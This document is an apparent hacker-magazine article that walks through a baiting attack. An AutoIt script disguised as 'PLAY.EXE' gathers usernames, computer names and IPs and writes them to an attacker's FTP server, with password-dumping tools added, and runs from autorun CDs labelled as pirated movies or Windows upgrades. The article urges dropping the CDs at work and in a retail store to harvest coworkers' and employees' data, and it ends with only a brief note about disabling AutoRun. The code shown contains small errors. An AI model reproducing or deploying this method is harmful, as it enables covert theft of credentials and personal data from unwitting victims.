Pirating the Caribbean

by Rob

In my previous article "iPod Sneakiness" (23:1), I described how to use an iPod to retrieve a local user's information.

This article was picked up by Hak5 and has evolved into the USB Switchblade and USB Hacksaw.

They have really expanded on the original concept, so if it is something that interests you, I suggest you go check it out.

Now on to bigger and better things.  With the iPod, you had to be on a local user's machine.   What if we could get that same info without ever touching a PC?  Let's see how this might work...

First off, buy a few blank CDs.  Total cost: about ten bucks.

Now, using the methods we talked about in the previous article, let's put together a script in AutoIt (or your favorite scripting language) that will gather local user info and put it on an FTP.

The example below is fairly benign.  It gathers usernames, IPs, and PC names:

$file=FileOpen("ftp://yourserver/folderwithonlywritepermissions/readme.txt", 1)

If $file = -1 Then 
  MsgBox(0, "Error", "Unable to open file.") 

FileWriteLine($file, 'Computername = ' & $Computername)
FileWriteLine($file, 'Username = ' & $Username)
FileWriteLine($file, 'Date = ' & $month & '/' & $Date & '/' & $Year)
FileWriteLine($tile, 'Time = ' & $Hour & ':' & $Minute)
FileWriteLine ($file, 'IP = ' & $IP)
FileWriteLine ($file, '----------') 
FileWriteLine ($file, ' ') 
FileClose ($file)

Add in some of the Nirsoft password gathering programs we talked about before to run silently and dump results, and you are in good shape.

So now we have the hacking part done, but how do we get someone to run this for us?  Here comes the social engineering part.

Compile your AutoIt script into an .EXE named "PLAY.EXE", assigning it an icon of an AVI or MOV.

Next, go download a few pictures from Google Images of a popular movie.  Let's use Pirates of the Caribbean as an example.  I would download the movie poster, and an icon (ICO) file.  The movie poster is just for authenticity, and the icon is for later.

Now, create an AutoRun file.  It's basically a text file with an .INF extension.  An example is below:

label=Pirates Of The Caribbean

Almost done.  Now go to IMDb and look up your movie.  Copy the description and paste it into a test document named README.  Once again, this is all for authenticity.

Create one more text document and name it data.  Take away the extension so it's a generic Windows icon.  (Authenticity yet again...)

Take all the files:

  1. PLAY.EXE - Your script
  2. MOVIEPOSTER.JPG - Your poster image
  3. POTC.ICO - Your icon file
  4. AUTORUN.INF - Your autorun
  5. Data - Your renamed text file

and burn them on the root of a CD.  Heck, burn them to about twenty CDs while you're at it.  Take your burned CD and write "Pirates of the Caribbean" on it with a Sharpie.

Grab your stack o' CDs and distribute them strategically.  Think about the places you can put them.  Maybe throw one in the bathroom at work and grab some coworker's information.  How about dropping one outside your local Best Buy for the random factor?  Heck, drop a few in Best Buy - maybe by a cash register - and see if you can get some employee's info.  Who can resist putting a burned CD into their PC, especially when they think they've found something free?

Don't limit this to movies.  Label a CD "Windows 7 Ultimate Upgrade" and download the appropriate icons to target the geekier among us.  The ideas are endless.

Warning - Responsible message follows:  If you are an IT person, you should probably disable AutoRun on all of your PCs as a matter of policy.  It will diminish the chances of this type of attack working, and it's just good common sense.  Enjoy.

Code: PLAY.au3